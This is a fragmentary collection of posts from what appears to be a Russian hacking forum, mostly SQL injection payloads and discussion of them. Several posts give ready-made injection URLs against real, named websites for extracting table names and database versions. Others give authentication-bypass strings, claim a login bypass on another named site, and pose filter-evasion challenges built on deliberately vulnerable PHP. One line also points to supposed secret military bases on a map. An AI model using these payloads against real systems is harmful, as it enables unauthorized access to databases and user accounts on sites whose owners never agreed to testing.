Separate names with a comma.
...(select table_name from information_schema.columns where column_name like 0x257061737325 limit 0,1)...
https://forum.antichat.ru/threadnav43966-1-10.html 3.1 Посимвольный перебор
http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb'+and+if(ascii(substring((select+table_name+from+information_schema.tables+limit+0...
HAXTA4OK, давай ссылку. Для телепатии недостаточно маны...
Ну например заюзать between 1' and 1=if(ascii(substring(user(),1,1)) between 0 and 150,1,0)--+ А ты уверен, что что-то должно выдавать...
http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1+offset+n)+from+1+...
С запятыми не пашет вроде...
Логин ' or 1=1/*@aa.fuck Пароль что угодно
http://maps.google.ru/?ie=UTF8&ll=69.456458,32.252576&spn=0.00317,0.016512&t=h&z=17 Мурманская область. Секретные военные базы. Нечто...
Чего полезного из этого можно извлечь ?...
Что-то тут такое наворочено не понятно. Лучше б переписал примеры с источника, там не нужно угадывать что подразумевалось Между прочим, там...
Хм, да это то, только своеобразно оформлено но сути не меняет, твой вариант даже круче )) Я рассчитывал на такое: Логин '=' Пароль '='...
Отлично, это работает. Я сам виноват, нужно было учесть || . Усложняем задачу: добавляем фильтрацию | и ограничение на 6 символов :) (хотя...
Так ведь не прокатит :) $login = preg_replace("/and|or/i","fuck",$login); Суть в том, чтобы обойтись без or
От мну Задание: Нужно попасть в админку, обойдите авторизацию Меджик_квотес=офф <?php $login = substr($_GET['login'],0,8);...
Мб лучше сделать тему в Уязвимостях для заданий по уязвимостям ? Ну там обходы фильтров и тд. Было б здорово. А то здесь как-то все в куче..
http://www.aawow.info/question2.php?id=-31+union+select+table_name+from+information_schema.tables+where+table_schema=0x6161776f77696e665f776f77...
http://www.aawow.info/question2.php?id=-31+union+select+version() В тайтле смотри 5.0.81-community-log
sqli_med.php $id = $_GET['id']; $id = mysql_real_escape_string($id); $getid="SELECT first_name, last_name FROM users WHERE user_id =...
К MSysObjects доступа нет, так что только перебором Кста там обход авторизации возможен http://www.bestperiodica.com/MyAccount.asp В E-mail...
